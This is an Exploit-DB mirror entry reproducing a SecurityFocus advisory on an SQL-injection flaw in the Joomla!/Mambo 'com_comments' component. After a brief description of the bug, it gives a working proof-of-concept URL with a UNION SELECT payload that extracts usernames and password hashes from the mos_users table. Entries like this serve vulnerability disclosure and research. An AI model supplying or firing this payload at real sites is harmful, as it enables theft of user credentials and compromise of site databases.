exploit-db-mirror/platforms/php/webapps/31137.txt
Offensive Security 5de5e59242 Updated 01_23_2014
2014-01-23 04:26:27 +00:00

7 lines
No EOL
607 B
Text
Executable file

source: http://www.securityfocus.com/bid/27731/info
The Joomla! and Mambo 'com_comments' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSWORD),0,0,0,0,0,0+FROM+mos_users+union+select+*+from+mos_content_comments+where+1=1